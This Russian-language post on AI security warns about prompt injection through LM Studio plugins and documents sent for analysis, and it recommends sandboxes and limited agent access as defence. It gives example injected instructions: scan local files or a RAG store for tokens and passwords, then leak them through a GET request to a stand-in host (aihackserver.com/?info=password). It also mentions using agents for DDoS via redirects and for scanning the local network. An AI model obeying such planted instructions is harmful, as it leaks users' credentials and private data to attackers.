Безопасная работа с ИИ: атаки через плагины и документы
Например, в LM Studio появились плагины. Я когда про них читал, погрузился в эту тему. Они пишутся на JavaScript, в перспективе будет Python, и закодить там можно всё, что угодно. Помимо того, что в коде самих плагинов может что-то быть, но это проверяется относительно просто, они могут ходить по сайтам и собирать информацию. В этих сайтах могут быть запрятаны инструкции что-то сделать, что вам не понравится. Например, проверить какие-то локальные файлы, к которым есть доступ, найти там какие-нибудь токены от платных сервисов и отправить их куда-то во вне веб запросом. Или что-то более простое - гонять модельку по редиректам, устраивая кому-то ддос, или просто отправить её сканировать localhost или твою локальную сеть.
Ещё один вполне реальный пример. Вам присылают документ, который вы автоматом отправляете в ИИ на анализ. В документе есть инструкция - добавить ссылку на вредоносный сайт или заменить существующую. Может быть и посложнее - проверить локальный RAG на предмет каких-то паролей, токенов или другой приватной информации, и перейти по адресу aihackserver.com/?info=password. Обычным GET запросом агент выдаст найденный пароль. А серия таких запросов может вообще какую угодно текстовую информацию выдать.
Чем плотнее ИИ-агенты будут интегрироваться в наши процессы, а мне видится это неизбежным уже в самом ближайшем будущем, тем больше у них будет доступов и возможностей. И тут впору появиться какому-то специализированному ИИ-антивирусу, который будет защищать от таких проблем. А пока их нет, вся защита на пользователях.
Публичные сервисы от всего этого защищены, а вот локальная защита - ваша ответственность. Самое очевидно - использовать самодельные песочницы. В простом случае - отдельные виртуалки и гонять информацию между ними без участия ИИ-агентов. И уж точно не запускать агентов с доступом ко всей информации или всему компьютеру. Сколько уже историй видел в инете, когда агенты грохали пользовательские файлы или всю систему.
#ai #security